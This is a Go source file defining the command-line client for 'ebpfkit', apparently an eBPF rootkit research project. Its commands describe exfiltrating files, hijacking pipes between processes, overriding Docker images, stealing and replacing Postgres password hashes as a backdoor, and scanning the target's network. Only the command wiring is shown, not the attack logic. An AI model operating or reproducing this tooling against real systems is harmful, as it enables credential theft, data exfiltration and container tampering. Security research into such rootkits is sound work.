/
cmd.go
302 lines (266 loc) · 8.87 KB
/
cmd.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
/*
Copyright © 2021 GUILLAUME FOURNIER
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package run
import (
"github.com/spf13/cobra"
)
// EBPFKitClient represents the base command of the ebpfKitClient
var EBPFKitClient = &cobra.Command{
Use: "ebpfkit-client",
}
var cmdFSWatch = &cobra.Command{
Use: "fs_watch",
Short: "file system watches",
Long: "fs_watch can be used to exfiltrate file content",
}
var cmdPipeProg = &cobra.Command{
Use: "pipe_prog",
Short: "piped programs configuration",
Long: "pipe_prog can be used to intercept and control pipes between two processes",
}
var cmdDockerProg = &cobra.Command{
Use: "docker",
Short: "Docker image override configuration",
Long: "the docker command can be used to configure how Docker images are overridden at runtime",
}
var cmdPostgresProg = &cobra.Command{
Use: "postgres",
Short: "postgresql authentication control",
Long: "the postgres command can be used to exfiltrate Postgresql password hashes and change them at runtime",
}
var cmdNetworkDiscoveryProg = &cobra.Command{
Use: "network_discovery",
Short: "network discovery configuration",
Long: "network_discovery can be used to scan the network of the target system",
}
var cmdAddFSWatch = &cobra.Command{
Use: "add [path of file]",
Short: "add a filesystem watch",
Long: "add is used to add a filesystem watch on the target system",
RunE: addFSWatchCmd,
Args: cobra.MinimumNArgs(1),
}
var cmdDeleteFSWatch = &cobra.Command{
Use: "delete [path of file]",
Short: "delete a filesystem watch",
Long: "delete is used to remove a filesystem watch on the target system",
RunE: deleteFSWatchCmd,
Args: cobra.MinimumNArgs(1),
}
var cmdGetFSWatch = &cobra.Command{
Use: "get [path of file]",
Short: "get a filesystem watch",
Long: "get is used to dump a watched file from the target system",
RunE: getFSWatchCmd,
Args: cobra.MinimumNArgs(1),
}
var cmdPutPipeProg = &cobra.Command{
Use: "put [program]",
Short: "put sends a program to pipe",
Long: "put is used to send a program and the command of the process you want to pipe it to on the target system",
RunE: putPipeProgCmd,
Args: cobra.MinimumNArgs(1),
}
var cmdDelPipeProg = &cobra.Command{
Use: "delete",
Short: "delete a piped program",
Long: "delete is used to delete a piped program on the target system",
RunE: delPipeProgCmd,
}
var cmdGetImagesList = &cobra.Command{
Use: "list",
Short: "list container images",
Long: "list returns the list of Docker images detected",
RunE: getImagesListCmd,
}
var cmdPutDockerImageOverride = &cobra.Command{
Use: "put",
Short: "put sends an image override request",
Long: "put is used to request that a Docker image is overridden on the target system",
RunE: putDockerImageOverrideCmd,
}
var cmdDelDockerImageOverride = &cobra.Command{
Use: "delete",
Short: "delete removes a Docker image override request",
Long: "delete is used to stop overriding the provided Docker image on the target system",
RunE: delDockerImageOverrideCmd,
}
var cmdPostgresCredentialsList = &cobra.Command{
Use: "list",
Short: "list postgres credentials",
Long: "list returns the list of the Postgres credentials detected on the target system",
RunE: getPostgresCredentialsCmd,
}
var cmdPutPGBackdoorSecret = &cobra.Command{
Use: "put",
Short: "put overrides a set of Postgres credentials",
Long: "put is used to override a set of Postgres credentials on the target system (the provided role needs to exist)",
RunE: putPostgresRoleCmd,
}
var cmdGetNetworkDiscovery = &cobra.Command{
Use: "get",
Short: "get network discovery data",
Long: "get returns the list of data collected by the network discovery feature on the target system",
RunE: getNetworkDiscoveryCmd,
}
var cmdGetNetworkDiscoveryScan = &cobra.Command{
Use: "scan",
Short: "scan the network of the target system",
Long: "scan triggers a network SYN scan on the target system with the provided parameters",
RunE: getNetworkDiscoveryScanCmd,
}
var cmdDelPGBackdoorSecret = &cobra.Command{
Use: "delete",
Short: "delete removes a set of Postgres credentials",
Long: "delete is used to remove a set of Postgres credentials from the target system",
RunE: delPostgresRoleCmd,
}
var options CLIOptions
func init() {
EBPFKitClient.PersistentFlags().VarP(
NewLogLevelSanitizer(&options.LogLevel),
"log-level",
"l",
"log level, options: panic, fatal, error, warn, info, debug or trace")
EBPFKitClient.PersistentFlags().VarP(
NewTargetParser(&options.Target),
"target",
"t",
"target application URL")
cmdFSWatch.PersistentFlags().BoolVar(
&options.InContainer,
"in-container",
false,
"defines if the watched file is in a container")
cmdFSWatch.PersistentFlags().BoolVar(
&options.Active,
"active",
false,
"defines if ebpfkit should passively wait for the file to be opened, or actively make a process open it")
cmdFSWatch.PersistentFlags().StringVarP(
&options.Output,
"output",
"o",
"",
"output file to write into")
cmdFSWatch.AddCommand(cmdAddFSWatch)
cmdFSWatch.AddCommand(cmdDeleteFSWatch)
cmdFSWatch.AddCommand(cmdGetFSWatch)
EBPFKitClient.AddCommand(cmdFSWatch)
cmdPipeProg.PersistentFlags().StringVar(
&options.From,
"from",
"",
"command of the program sending data over the pipe (16 chars, '#' is a forbidden char)")
cmdPipeProg.PersistentFlags().StringVar(
&options.To,
"to",
"",
"command of the program reading data from the pipe (16 chars, '#' is a forbidden char)")
cmdPipeProg.PersistentFlags().BoolVar(
&options.Backup,
"backup",
false,
"defines if ebpfkit should backup the original piped data and re-inject it after the provided program")
cmdPipeProg.AddCommand(cmdPutPipeProg)
cmdPipeProg.AddCommand(cmdDelPipeProg)
EBPFKitClient.AddCommand(cmdPipeProg)
cmdGetImagesList.PersistentFlags().StringVarP(
&options.Output,
"output",
"o",
"",
"output file to write into")
cmdPutDockerImageOverride.PersistentFlags().StringVar(
&options.From,
"from",
"",
"defines the Docker image to override")
cmdPutDockerImageOverride.PersistentFlags().StringVar(
&options.To,
"to",
"",
"defines the Docker image to override with")
cmdPutDockerImageOverride.PersistentFlags().IntVar(
&options.Override,
"override",
0,
"defines the action to take: 0 for nop, 1 for replace")
cmdPutDockerImageOverride.PersistentFlags().IntVar(
&options.Ping,
"ping",
0,
"defines the answer to give on a ping from the input Docker image: 0 for nop, 1 for crash, 2 for run and 3 for hide")
cmdDelDockerImageOverride.PersistentFlags().StringVar(
&options.From,
"from",
"",
"defines the Docker image")
cmdDockerProg.AddCommand(cmdGetImagesList)
cmdDockerProg.AddCommand(cmdPutDockerImageOverride)
cmdDockerProg.AddCommand(cmdDelDockerImageOverride)
EBPFKitClient.AddCommand(cmdDockerProg)
cmdPostgresCredentialsList.PersistentFlags().StringVarP(
&options.Output,
"output",
"o",
"",
"output file to write into")
cmdPutPGBackdoorSecret.PersistentFlags().StringVar(
&options.Secret,
"secret",
"",
"defines the Postgres secret to send")
cmdPutPGBackdoorSecret.PersistentFlags().StringVar(
&options.Role,
"role",
"",
"defines the Postgres role to send")
cmdDelPGBackdoorSecret.PersistentFlags().StringVar(
&options.Role,
"role",
"",
"defines the Postgres role to delete")
cmdPostgresProg.AddCommand(cmdPostgresCredentialsList)
cmdPostgresProg.AddCommand(cmdPutPGBackdoorSecret)
cmdPostgresProg.AddCommand(cmdDelPGBackdoorSecret)
EBPFKitClient.AddCommand(cmdPostgresProg)
cmdGetNetworkDiscovery.PersistentFlags().BoolVar(
&options.ActiveDiscovery,
"active",
false,
"defines if flows discovered by the active scan should be shown")
cmdGetNetworkDiscovery.PersistentFlags().BoolVar(
&options.PassiveDiscovery,
"passive",
false,
"defines if flows discovered by the passive scan should be shown")
cmdGetNetworkDiscoveryScan.PersistentFlags().StringVar(
&options.IP,
"ip",
"",
"defines the starting IP address of the network scan")
cmdGetNetworkDiscoveryScan.PersistentFlags().StringVar(
&options.Port,
"port",
"",
"defines the starting port of the network scan")
cmdGetNetworkDiscoveryScan.PersistentFlags().StringVar(
&options.Range,
"range",
"20",
"defines the number of ports to scan, starting at the port defined by 'port'")
cmdNetworkDiscoveryProg.AddCommand(cmdGetNetworkDiscovery)
cmdNetworkDiscoveryProg.AddCommand(cmdGetNetworkDiscoveryScan)
EBPFKitClient.AddCommand(cmdNetworkDiscoveryProg)
}